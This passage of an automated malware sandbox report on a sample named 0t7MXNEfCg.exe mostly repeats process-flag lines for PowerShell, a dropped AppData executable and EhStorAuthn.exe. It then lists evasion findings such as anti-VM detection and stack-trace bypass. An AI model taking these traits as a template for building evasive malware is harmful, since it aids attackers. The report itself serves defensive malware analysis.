                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: 0t7MXNEfCg.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HrovwwypYVlFWB.exe PID: 6448, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424ED324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424ED7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424ED944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424ED504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424ED544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424ED1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424F0154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFA424EDA44
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 15D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 5760000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 6760000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 6890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: 7890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: C530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: D530000 memory reserve | memory write watchJump to behavior
